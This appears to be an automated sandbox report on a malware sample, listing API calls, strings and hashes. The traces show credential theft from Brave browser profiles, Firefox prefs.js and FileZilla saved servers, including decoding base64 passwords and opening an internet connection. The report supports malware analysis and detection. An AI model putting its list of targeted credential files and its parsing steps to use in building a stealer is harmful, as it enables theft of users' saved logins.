                          • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                          • API String ID: 2635522530-726946144
                          • Opcode ID: 90462745d3b91bf15712ceff75b61dd5e9c359d2a40abd42cbe1a49849abf4c3
                          • Instruction ID: 030f736cf84090c6ee5dfc31ff955ce9c0423aae3b19a390a911fd597a6fe574
                          • Opcode Fuzzy Hash: 90462745d3b91bf15712ceff75b61dd5e9c359d2a40abd42cbe1a49849abf4c3
                          • Instruction Fuzzy Hash: CC925F7591020A9BEB20EFB4DC89AEE7FB9BF85700F044529F906A7251DB34DDC58B90
                          APIs
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 005218D2
                          • lstrlen.KERNEL32(\*.*), ref: 005218DD
                          • lstrcpy.KERNEL32(00000000,?), ref: 005218FF
                          • lstrcat.KERNEL32(00000000,\*.*), ref: 0052190B
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00521932
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 00521947
                          • StrCmpCA.SHLWAPI(?,005417A0), ref: 00521967
                          • StrCmpCA.SHLWAPI(?,005417A4), ref: 00521981
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 005219BF
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 005219F2
                          • lstrcpy.KERNEL32(00000000,?), ref: 00521A1A
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00521A25
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00521A4C
                          • lstrlen.KERNEL32(00541794), ref: 00521A5E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00521A80
                          • lstrcat.KERNEL32(00000000,00541794), ref: 00521A8C
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00521AB4
                          • lstrlen.KERNEL32(?), ref: 00521AC8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00521AE5
                          • lstrcat.KERNEL32(00000000,?), ref: 00521AF3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00521B19
                          • lstrlen.KERNEL32(011A8B70), ref: 00521B2F
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00521B59
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00521B64
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00521B8F
                          • lstrlen.KERNEL32(00541794), ref: 00521BA1
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00521BC3
                          • lstrcat.KERNEL32(00000000,00541794), ref: 00521BCF
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00521BF8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00521C25
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00521C30
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00521C57
                          • lstrlen.KERNEL32(00541794), ref: 00521C69
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00521C8B
                          • lstrcat.KERNEL32(00000000,00541794), ref: 00521C97
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00521CC0
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00521CEF
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00521CFA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00521D21
                          • lstrlen.KERNEL32(00541794), ref: 00521D33
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00521D55
                          • lstrcat.KERNEL32(00000000,00541794), ref: 00521D61
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00521D8A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00521DB9
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00521DC4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00521DED
                          • lstrlen.KERNEL32(00541794), ref: 00521E19
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00521E36
                          • lstrcat.KERNEL32(00000000,00541794), ref: 00521E42
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00521E68
                          • lstrlen.KERNEL32(011ACFB0), ref: 00521E7E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00521EB2
                          • lstrlen.KERNEL32(00541794), ref: 00521EC6
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00521EE3
                          • lstrcat.KERNEL32(00000000,00541794), ref: 00521EEF
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00521F15
                          • lstrlen.KERNEL32(011AD308), ref: 00521F2B
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00521F5F
                          • lstrlen.KERNEL32(00541794), ref: 00521F73
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00521F90
                          • lstrcat.KERNEL32(00000000,00541794), ref: 00521F9C
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00521FC2
                          • lstrlen.KERNEL32(0119B1D0), ref: 00521FD8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00522000
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0052200B
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00522036
                          • lstrlen.KERNEL32(00541794), ref: 00522048
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00522067
                          • lstrcat.KERNEL32(00000000,00541794), ref: 00522073
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00522098
                          • lstrlen.KERNEL32(?), ref: 005220AC
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 005220D0
                          • lstrcat.KERNEL32(00000000,?), ref: 005220DE
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00522103
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 0052213F
                          • lstrlen.KERNEL32(011ACF20), ref: 0052214E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00522176
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00522181
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$FileFindFirst
                          • String ID: \*.*
                          • API String ID: 712834838-1173974218
                          • Opcode ID: e4898a17f51aa8d956a5b724008fc05151d5269157a1099721a31a2d0c22549f
                          • Instruction ID: ff4120ca7a0a3167deb7360f6f58b72bf9048277ebd2a57f2e9a957358d8386d
                          • Opcode Fuzzy Hash: e4898a17f51aa8d956a5b724008fc05151d5269157a1099721a31a2d0c22549f
                          • Instruction Fuzzy Hash: 6F62803591162BABDB21AB74EC4CAEF7FB9BF92700F044025B805A7291DB34DD85CB94
                          APIs
                          • wsprintfA.USER32 ref: 0052392C
                          • FindFirstFileA.KERNEL32(?,?), ref: 00523943
                          • StrCmpCA.SHLWAPI(?,005417A0), ref: 0052396C
                          • StrCmpCA.SHLWAPI(?,005417A4), ref: 00523986
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 005239BF
                          • lstrcpy.KERNEL32(00000000,?), ref: 005239E7
                          • lstrcat.KERNEL32(00000000,00000000), ref: 005239F2
                          • lstrlen.KERNEL32(00541794), ref: 005239FD
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00523A1A
                          • lstrcat.KERNEL32(00000000,00541794), ref: 00523A26
                          • lstrlen.KERNEL32(?), ref: 00523A33
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00523A53
                          • lstrcat.KERNEL32(00000000,?), ref: 00523A61
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00523A8A
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 00523ACE
                          • lstrlen.KERNEL32(?), ref: 00523AD8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00523B05
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00523B10
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00523B36
                          • lstrlen.KERNEL32(00541794), ref: 00523B48
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00523B6A
                          • lstrcat.KERNEL32(00000000,00541794), ref: 00523B76
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00523B9E
                          • lstrlen.KERNEL32(?), ref: 00523BB2
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00523BD2
                          • lstrcat.KERNEL32(00000000,?), ref: 00523BE0
                          • lstrlen.KERNEL32(011A8A20), ref: 00523C0B
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00523C31
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00523C3C
                          • lstrlen.KERNEL32(011A8B70), ref: 00523C5E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00523C84
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00523C8F
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00523CB7
                          • lstrlen.KERNEL32(00541794), ref: 00523CC9
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00523CE8
                          • lstrcat.KERNEL32(00000000,00541794), ref: 00523CF4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00523D1A
                          • lstrcpy.KERNEL32(00000000,?), ref: 00523D47
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00523D52
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00523D79
                          • lstrlen.KERNEL32(00541794), ref: 00523D8B
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00523DAD
                          • lstrcat.KERNEL32(00000000,00541794), ref: 00523DB9
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00523DE2
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00523E11
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00523E1C
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00523E43
                          • lstrlen.KERNEL32(00541794), ref: 00523E55
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00523E77
                          • lstrcat.KERNEL32(00000000,00541794), ref: 00523E83
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00523EAC
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00523EDB
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00523EE6
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00523F0D
                          • lstrlen.KERNEL32(00541794), ref: 00523F1F
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00523F41
                          • lstrcat.KERNEL32(00000000,00541794), ref: 00523F4D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00523F75
                          • lstrlen.KERNEL32(?), ref: 00523F89
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00523FA9
                          • lstrcat.KERNEL32(00000000,?), ref: 00523FB7
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00523FE0
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 0052401F
                          • lstrlen.KERNEL32(011ACF20), ref: 0052402E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00524056
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00524061
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0052408A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 005240CE
                          • lstrcat.KERNEL32(00000000), ref: 005240DB
                          • FindNextFileA.KERNEL32(00000000,?), ref: 005242D9
                          • FindClose.KERNEL32(00000000), ref: 005242E8
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$Find$File$CloseFirstNextwsprintf
                          • String ID: %s\*.*
                          • API String ID: 1006159827-1013718255
                          • Opcode ID: a57fe9566ac56cc241d3d6409c3856c26aae119bf6ec956bca73e9c0173fa3e9
                          • Instruction ID: eacdcf6624c44c592a5a96d5e6c13116746e73b565732ad66174b8a9ca19ec05
                          • Opcode Fuzzy Hash: a57fe9566ac56cc241d3d6409c3856c26aae119bf6ec956bca73e9c0173fa3e9
                          • Instruction Fuzzy Hash: 8E62713591162B9BDB21AF74EC4DAEE7BB9BF42700F048125B805A7290DB38DD85CB90
                          APIs
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 00526995
                          • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 005269C8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00526A02
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00526A29
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00526A34
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00526A5D
                          • lstrlen.KERNEL32(\AppData\Roaming\FileZilla\recentservers.xml), ref: 00526A77
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00526A99
                          • lstrcat.KERNEL32(00000000,\AppData\Roaming\FileZilla\recentservers.xml), ref: 00526AA5
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00526AD0
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00526B00
                          • LocalAlloc.KERNEL32(00000040,?), ref: 00526B35
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 00526B9D
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 00526BCD
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$AllocFolderLocalPathlstrlen
                          • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                          • API String ID: 313953988-555421843
                          • Opcode ID: 60bdd9b8a83293b07b3f415e69cb2c32211d60c9b921908b162496630b529bb3
                          • Instruction ID: d8e927c76efc748b2f8d442479a36e8f3622a29dff36edf4f27d20b9c383dc76
                          • Opcode Fuzzy Hash: 60bdd9b8a83293b07b3f415e69cb2c32211d60c9b921908b162496630b529bb3
                          • Instruction Fuzzy Hash: 2B429174A0122AABDB21EBB4EC89AAF7FB9BF46700F049415F901E7291DB74DD41CB50
                          APIs
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 0051DBC1
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051DBE4
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0051DBEF
                          • lstrlen.KERNEL32(00544CA8), ref: 0051DBFA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051DC17
                          • lstrcat.KERNEL32(00000000,00544CA8), ref: 0051DC23
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051DC4C
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 0051DC8F
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 0051DCBF
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 0051DCD0
                          • StrCmpCA.SHLWAPI(?,005417A0), ref: 0051DCF0
                          • StrCmpCA.SHLWAPI(?,005417A4), ref: 0051DD0A
                          • lstrlen.KERNEL32(0053CFEC), ref: 0051DD1D
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 0051DD47
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051DD70
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0051DD7B
                          • lstrlen.KERNEL32(00541794), ref: 0051DD86
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051DDA3
                          • lstrcat.KERNEL32(00000000,00541794), ref: 0051DDAF
                          • lstrlen.KERNEL32(?), ref: 0051DDBC
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051DDDF
                          • lstrcat.KERNEL32(00000000,?), ref: 0051DDED
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051DE19
                          • lstrlen.KERNEL32(00541794), ref: 0051DE3D
                          • lstrcpy.KERNEL32(00000000,?), ref: 0051DE6F
                          • lstrcat.KERNEL32(00000000,00541794), ref: 0051DE7B
                          • lstrlen.KERNEL32(011A8840), ref: 0051DE8A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051DEB0
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0051DEBB
                          • lstrlen.KERNEL32(00541794), ref: 0051DEC6
                          • lstrcpy.KERNEL32(00000000,?), ref: 0051DEE6
                          • lstrcat.KERNEL32(00000000,00541794), ref: 0051DEF2
                          • lstrlen.KERNEL32(011A8A80), ref: 0051DF01
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051DF27
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0051DF32
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051DF5E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051DFA5
                          • lstrcat.KERNEL32(00000000,00541794), ref: 0051DFB1
                          • lstrlen.KERNEL32(011A8840), ref: 0051DFC0
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051DFE9
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0051DFF4
                          • lstrlen.KERNEL32(00541794), ref: 0051DFFF
                          • lstrcpy.KERNEL32(00000000,?), ref: 0051E022
                          • lstrcat.KERNEL32(00000000,00541794), ref: 0051E02E
                          • lstrlen.KERNEL32(011A8A80), ref: 0051E03D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051E063
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0051E06E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051E09A
                          • StrCmpCA.SHLWAPI(?,Brave), ref: 0051E0CD
                          • StrCmpCA.SHLWAPI(?,Preferences), ref: 0051E0E7
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 0051E11F
                          • lstrlen.KERNEL32(011ACF20), ref: 0051E12E
                          • lstrcpy.KERNEL32(00000000,?), ref: 0051E155
                          • lstrcat.KERNEL32(00000000,?), ref: 0051E15D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051E19F
                          • lstrcat.KERNEL32(00000000), ref: 0051E1A9
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051E1D0
                          • CopyFileA.KERNEL32(00000000,?,00000001), ref: 0051E1F9
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 0051E22F
                          • lstrlen.KERNEL32(011A8A20), ref: 0051E23D
                          • lstrcpy.KERNEL32(00000000,?), ref: 0051E261
                          • lstrcat.KERNEL32(00000000,011A8A20), ref: 0051E269
                          • FindNextFileA.KERNEL32(00000000,?), ref: 0051E988
                          • FindClose.KERNEL32(00000000), ref: 0051E997
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$FileFind$CloseCopyFirstNext
                          • String ID: Brave$Preferences$\Brave\Preferences
                          • API String ID: 1346089424-1230934161
                          • Opcode ID: 1647a92bc30a3cdf41d55d1153a5e48105df22c86816ee649eeb3f32e06bf572
                          • Instruction ID: 4b16225c740a8ff766668d9de4200805ec4496dbe71d1b2d23d4581a34b34d0a
                          • Opcode Fuzzy Hash: 1647a92bc30a3cdf41d55d1153a5e48105df22c86816ee649eeb3f32e06bf572
                          • Instruction Fuzzy Hash: 22526E7591020A9BEB21AFB4DC89AEE7FB9BF85700F044529F80697251DB74DCC5CBA0
                          APIs
                          • lstrcpy.KERNEL32(00000000,?), ref: 005160FF
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 00516152
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 00516185
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 005161B5
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 005161F0
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 00516223
                          • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00516233
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$InternetOpen
                          • String ID: "$------
                          • API String ID: 2041821634-2370822465
                          • Opcode ID: 2da6c94599b6a209796d75a734760cb8a7976eab7f1120b7a16a3ae35573604f
                          • Instruction ID: d899ceee862eacc3168b5f72ef536097715f9edbe3bbb16506ac4b6b5f992017
                          • Opcode Fuzzy Hash: 2da6c94599b6a209796d75a734760cb8a7976eab7f1120b7a16a3ae35573604f
                          • Instruction Fuzzy Hash: 8F526C7591021A9BEB21EFB4DC89AEF7BB9BF85300F048425F905A7251DB74EC81CB94
                          APIs
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 00526B9D
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 00526BCD
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 00526BFD
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 00526C2F
                          • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00526C3C
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00526C43
                          • StrStrA.SHLWAPI(00000000,<Host>), ref: 00526C5A
                          • lstrlen.KERNEL32(00000000), ref: 00526C65
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00526CA8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00526CCF
                          • StrStrA.SHLWAPI(00000000,<Port>), ref: 00526CE2
                          • lstrlen.KERNEL32(00000000), ref: 00526CED
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00526D30
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00526D57
                          • StrStrA.SHLWAPI(00000000,<User>), ref: 00526D6A
                          • lstrlen.KERNEL32(00000000), ref: 00526D75
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00526DB8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00526DDF
                          • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00526DF2
                          • lstrlen.KERNEL32(00000000), ref: 00526E01
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00526E49
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00526E71
                          • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00526E94
                          • LocalAlloc.KERNEL32(00000040,00000000), ref: 00526EA8
                          • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00526EC9
                          • LocalFree.KERNEL32(00000000), ref: 00526ED4
                          • lstrlen.KERNEL32(?), ref: 00526F6E
                          • lstrlen.KERNEL32(?), ref: 00526F81
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$BinaryCryptHeapLocalString$AllocAllocateFreeProcess
                          • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$browser: FileZilla$login: $password: $profile: null$url:
                          • API String ID: 2641759534-2314656281
                          • Opcode ID: d1f6b838f0fcbe698acf6af573f0111c5251046c856acb9ec38b64296fbf522f
                          • Instruction ID: 7f58970b2cd618d3f8913121f931e24a8ed85b1d09551a3b68b5300f7694adb5
                          • Opcode Fuzzy Hash: d1f6b838f0fcbe698acf6af573f0111c5251046c856acb9ec38b64296fbf522f
                          • Instruction Fuzzy Hash: DB029F74A0021AABDB21EBB4EC4DAAF7FB9BF46700F045415F901E7291DB74DD818B64
                          APIs
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 00524B51
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00524B74
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00524B7F
                          • lstrlen.KERNEL32(00544CA8), ref: 00524B8A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00524BA7
                          • lstrcat.KERNEL32(00000000,00544CA8), ref: 00524BB3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00524BDE
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 00524BFA
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                          • String ID: prefs.js
                          • API String ID: 2567437900-3783873740
                          • Opcode ID: dceacbf57353ce23c03e44a841c6dec4abd89126e30f9fe320f9b93f5fc726b5
                          • Instruction ID: 5f941b5b87a72af65fd89e61f2a89756bf7ca57dd5a3a1670d6ef0fbbdfc29bd
                          • Opcode Fuzzy Hash: dceacbf57353ce23c03e44a841c6dec4abd89126e30f9fe320f9b93f5fc726b5
